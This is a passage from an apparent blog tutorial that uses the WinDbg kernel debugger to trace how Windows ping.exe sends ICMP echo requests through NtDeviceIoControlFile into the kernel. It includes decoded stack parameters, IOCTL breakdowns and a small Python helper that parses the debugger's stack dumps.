</ul><blockquote><span style="font-size: x-small;"><span style="color: yellow; font-family: "Courier New",Courier,monospace;">kd> bp ntdll!NtDeviceIoControlFile</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> </span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> kd> bl</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 0 d 76d6b73c 0001 (0001) iphlpapi!IcmpSendEcho2</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 e 01002376 0001 (0001) ping!main+0x9ad</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 2 e 7c90d8e3 0001 (0001) ntdll!NtDeviceIoControlFile</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> Breakpoint 2 hit</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ntdll!NtDeviceIoControlFile:</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 001b:7c90d8e3 b842000000 mov eax,42h</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><br style="color: yellow; 
font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> kd> kb</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ChildEBP RetAddr Args to Child </span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 0007f9ac 76d6b8c4 0000074c 00000744 00000000 ntdll!NtDeviceIoControlFile</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> WARNING: Stack unwind information not available. Following frames may be wrong.</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 0007f9f8 0100237b 0000074c 00000000 00000000 iphlpapi!IcmpSendEcho2+0x188</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 0007ff44 010029eb 00000003 00034020 00032a98 ping!main+0x9b2</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 0007ffc0 7c816fd7 00000010 00000000 7ffd4000 ping!mainCRTStartup+0x125</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 0007fff0 00000000 010028c6 00000000 78746341 kernel32!BaseProcessStart+0x23</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> </span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier 
New",Courier,monospace;"> kd> !handle 0000074c </span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> processor number 0, process 817f1428</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> PROCESS 817f1428 SessionId: 0 Cid: 00ac Peb: 7ffd4000 ParentCid: 077c</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> DirBase: 085c0260 ObjectTable: e1b31c88 HandleCount: 47.</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> Image: ping.exe</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> Handle table at e1157000 with 47 Entries in use</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 074c: Object: 81779bb0 GrantedAccess: 001200a0 Entry: e1157e98</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> Object: 81779bb0 Type: (819b8560) File</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ObjectHeader: 81779b98 (old version)</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> HandleCount: 1 PointerCount: 1</span></span> </blockquote><ul><li>Observe the stack:</li>
</ul><blockquote style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">kd> dd esp lb<br />
0007f9b0 76d6b8c4 0000074c 00000744 00000000<br />
0007f9c0 00000000 000a4720 00120000 000a4bf0<br />
0007f9d0 00001ff8 000a2730 00001ff0</span></blockquote> <br />
<blockquote> <span style="font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;"> </span><span style="color: yellow; font-family: "Courier New",Courier,monospace;">Retn Addr: 76d6b8c4</span></span><br />
<div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"> <b><span style="color: red;">1st param: FileHandle > 0000074c</span></b></span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"> <span style="color: yellow;"> 2nd param: Event > 00000744</span></span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"> 3rd param: ApcRoutine > 00000000</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"> 4th param: ApcContext > 00000000</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"> 5th param: IoStatusBlock > 000a4720</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"> <b> <span style="color: red;">6th param: IoControlCode > 00120000</span></b></span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"> <span style="color: yellow;">7th param: InputBuffer > 000a4bf0</span></span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"> 8th param: InputBufferLength > 00001ff8</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"> 9th param: OutputBuffer > 000a2730</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"> 10th param: OutputBufferLength > 00001ff0</span></div></blockquote><br />
<ul><li>IoControlCode = 0x120000</li>
</ul><div style="text-align: center;">File Device Type = FILE_DEVICE_NETWORK</div><div style="text-align: center;"> Access = FILE_ANY_ACCESS<br />
Method = METHOD_BUFFERED </div><div style="text-align: center;"><br />
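To make the decode above repeatable, here is an added Python helper (not from the original post) that splits a WinDbg <code>dd esp lb</code> dump into the return address and the ten <b>NtDeviceIoControlFile</b> parameters, then breaks the <b>IoControlCode</b> into its CTL_CODE fields. The sample dump is the one captured at the user-mode breakpoint above; the x86 stdcall frame layout (return address first, then arguments in declaration order) is assumed.

```python
"""Decode a captured ntdll!NtDeviceIoControlFile call from a WinDbg `dd esp` dump.

Added helper, not part of the original post. Assumes the x86 frame at function
entry: [esp] = return address, followed by the ten arguments in order.
"""
import re

# Argument order of NtDeviceIoControlFile (ten dwords after the return address).
PARAM_NAMES = (
    "FileHandle", "Event", "ApcRoutine", "ApcContext", "IoStatusBlock",
    "IoControlCode", "InputBuffer", "InputBufferLength",
    "OutputBuffer", "OutputBufferLength",
)

# Subset of the FILE_DEVICE_* values from the DDK headers.
DEVICE_TYPES = {
    0x07: "FILE_DEVICE_DISK",
    0x09: "FILE_DEVICE_FILE_SYSTEM",
    0x12: "FILE_DEVICE_NETWORK",
    0x21: "FILE_DEVICE_TRANSPORT",
    0x22: "FILE_DEVICE_UNKNOWN",
}
METHODS = ("METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER")
ACCESS = {
    0: "FILE_ANY_ACCESS",
    1: "FILE_READ_ACCESS",
    2: "FILE_WRITE_ACCESS",
    3: "FILE_READ_ACCESS | FILE_WRITE_ACCESS",
}

# `dd esp lb` output captured at the user-mode breakpoint in the session above.
SAMPLE_DD = """
0007f9b0 76d6b8c4 0000074c 00000744 00000000
0007f9c0 00000000 000a4720 00120000 000a4bf0
0007f9d0 00001ff8 000a2730 00001ff0
"""

HEX_DWORD = re.compile(r"^[0-9a-fA-F]{8}$")


def parse_dd(dump: str) -> list:
    """Flatten WinDbg `dd` output: each line is an address followed by up to four dwords."""
    words = []
    for line in dump.strip().splitlines():
        cols = line.split()
        if len(cols) < 2 or not HEX_DWORD.match(cols[0]):
            continue  # skip the `kd>` prompt, headers and blank lines
        for tok in cols[1:]:
            if not HEX_DWORD.match(tok):
                raise ValueError(f"unexpected token in dd output: {tok!r}")
            words.append(int(tok, 16))
    return words


def ctl_code(device_type: int, function: int, method: int, access: int) -> int:
    """CTL_CODE macro from the DDK: (DeviceType << 16) | (Access << 14) | (Function << 2) | Method."""
    return (device_type << 16) | (access << 14) | (function << 2) | method


def decode_ioctl(code: int) -> dict:
    """Split an IoControlCode into its four CTL_CODE fields, with symbolic names where known."""
    device_type = (code >> 16) & 0xFFFF
    access = (code >> 14) & 0x3
    function = (code >> 2) & 0xFFF
    method = code & 0x3
    return {
        "DeviceType": device_type,
        "DeviceTypeName": DEVICE_TYPES.get(device_type, f"0x{device_type:x} (not in table)"),
        "Access": access,
        "AccessName": ACCESS[access],
        "Function": function,
        "Method": method,
        "MethodName": METHODS[method],
    }


def decode_call(dump: str) -> dict:
    """Map the stack dump onto NtDeviceIoControlFile's return address and parameters."""
    words = parse_dd(dump)
    if len(words) < 1 + len(PARAM_NAMES):
        raise ValueError("dump too short: need the return address plus 10 arguments")
    params = dict(zip(PARAM_NAMES, words[1:1 + len(PARAM_NAMES)]))
    return {
        "ReturnAddress": words[0],
        "params": params,
        "ioctl": decode_ioctl(params["IoControlCode"]),
    }


if __name__ == "__main__":
    result = decode_call(SAMPLE_DD)
    print(f"Retn Addr: {result['ReturnAddress']:08x}")
    for i, (name, value) in enumerate(result["params"].items(), 1):
        print(f"{i:>2}. {name:<19} {value:08x}")
    io = result["ioctl"]
    print(f"IoControlCode 0x{result['params']['IoControlCode']:x}: {io['DeviceTypeName']}, "
          f"{io['AccessName']}, function {io['Function']}, {io['MethodName']}")
```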
</div><div style="color: blue; text-align: left;"><span style="font-size: x-large;">Inside the Kernel</span></div><div style="text-align: left;"><br />
<ol><li>NtDeviceIoControlFile</li>
<ul><li>To follow <b>NtDeviceIoControlFile</b> into kernel mode, we set a breakpoint on the Windows native system service <b>nt!NtDeviceIoControlFile</b> and another on the caller of <b>IcmpSendEcho2</b>:</li>
</ul></ol><blockquote><span style="font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;"> <span style="color: yellow;"> kd> bp nt!NtDeviceIoControlFile "!handle esp+4;dd esp lb"</span> <span style="color: #38761d;">// Show the object handle and the parameters</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> <span style="color: yellow;"> kd> bp ping!main+0x9ad</span></span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> kd> bl</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 0 e 8056d590 0001 (0001) nt!NtDeviceIoControlFile "!handle esp+4;dd esp lb"</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 d 76d6b73c 0001 (0001) iphlpapi!IcmpSendEcho2</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 2 e 01002376 0001 (0001) ping!main+0x9ad</span></span></blockquote><ul><ul><li>The purpose of doing this is to obtain a list of <b>IoControlCode</b> passed to the kernel immediately after <b>ping</b> send ICMP echo. We will stop collecting <b>Iocontrolcode</b> when breakpoint hits back <b>ping!main+0x9ad</b>.</li>
<li>The first <b>IoControlCode</b> sent to the kernel. Notice that the <b>IoControlCode</b>, process name and handle match exactly what we got in user mode above (highlighted in <b style="color: red;">red</b>):</li>
</ul></ul><blockquote> <span style="color: yellow; font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153f020</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153f020 SessionId: 0 Cid: 05cc Peb: 7ffde000 ParentCid: 0298</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340280 ObjectTable: e1ac1728 HandleCount: 47.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: ping.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00720add</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f93a5d38 8053ca28 0000074c 00000744 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f93a5d48 00000000 000a4720 00120000 000a4bf0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f93a5d58 00001ff8 000a2730 00001ff0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span></span></blockquote><ul><ul><li>The second <b>IoControlCode</b> is passed by <b>explorer.exe</b>:</li>
</ul></ul><blockquote> <span style="color: yellow; font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 0000031c 00000218 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f750 00120003 00c9f778</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f7b8 0000005c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span></span> </blockquote><ul><ul><li>The list is very long, and many duplicated <b>IoControlCode</b> values are sent to the kernel:</li>
</ul></ul><blockquote> <span style="color: yellow; font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;">kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 0000031c 00000218 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f750 00120003 00c9f778</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f7b8 0000005c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: 
"Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 0000031c 00000218 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f750 00120003 00c9f778</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f7b8 0000005c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: 
"Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 000004ac 00000218 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f784 00120040 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000000 01fc8008 00000c30</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 
nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f500 00120003 00c9f5ac</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00168858 00000100</span><br style="font-family: "Courier New",Courier,monospace;" /><span 
style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 0000031c 00000218 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f4e0 00120003 00c9f508</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f548 0000005c</span><br 
style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 0000031c 00000218 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f4e0 00120003 00c9f508</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier 
New",Courier,monospace;"> f75dad58 00000024 00c9f548 0000005c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 000004ac 00000218 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f514 00120040 00000000</span><br style="font-family: "Courier 
New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000000 0018ad70 00000c30</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" 